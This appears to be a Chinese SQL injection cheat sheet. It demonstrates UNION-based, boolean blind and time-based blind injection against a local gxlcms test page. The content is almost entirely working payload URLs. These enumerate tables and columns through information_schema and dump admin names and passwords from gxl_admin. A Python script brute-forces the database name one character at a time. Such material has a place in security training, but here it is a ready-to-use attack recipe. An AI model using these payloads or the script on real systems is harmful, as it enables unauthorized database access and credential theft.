一:union报错注入
猜字段长度:
order by 28
先显示位
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9
当前数据库:
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,database()
爆数据表:
http://127.0.0.1/sql.php?cmd=1 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name) from information_schema.tables where table_schema='gxlcms'
爆字段:
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name) from information_schema.columns where table_name='gxl_admin'
出数据
http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(admin_name,admin_pwd) from gxl_admin
二:bool盲注
数据库名是:gxlcms
判断当前数据库长度/内容
http://127.0.0.1/sql.php?cmd=1 and length(database())=6
出数据库名
http://127.0.0.1/sql.php?cmd=1 and mid(database(),2,1)='x'
#coding:utf-8 #简单boole 盲注脚本 import urllib #获取当前数据库长度,并猜解出来 url = 'http://127.0.0.1/sql.php?cmd=1' payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' table1='' for i in range(1,20): payloadl = ' and length(database())=%s'%i html = urllib.urlopen(url+payloadl).read() #print html if 'Array' in html:#判断语句自己修改 print "The length is %s: "%i length = i break for x in range(1,length+1): for p in payloads: p2 = ' and mid(database(),%s,1)=\'%s\'' %(x,p) r2 = urllib.urlopen(url+p2).read() if 'Array' in r2:#判断语句自己修改 table1+=p print table1
三:时间注入
判断数据库长度
http://127.0.0.1/sql.php?cmd=1 and if(length(database())=6,sleep(5),1);
判断数据库内容:
http://127.0.0.1/sql.php?cmd=1 and if(mid(database(),1,1)='g',sleep(5),1);
时间盲注的脚本之前也写了个,将就着用吧!